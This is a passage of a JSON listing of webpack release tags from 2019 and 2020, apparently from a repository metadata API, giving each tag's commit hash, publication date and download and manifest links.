.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://githu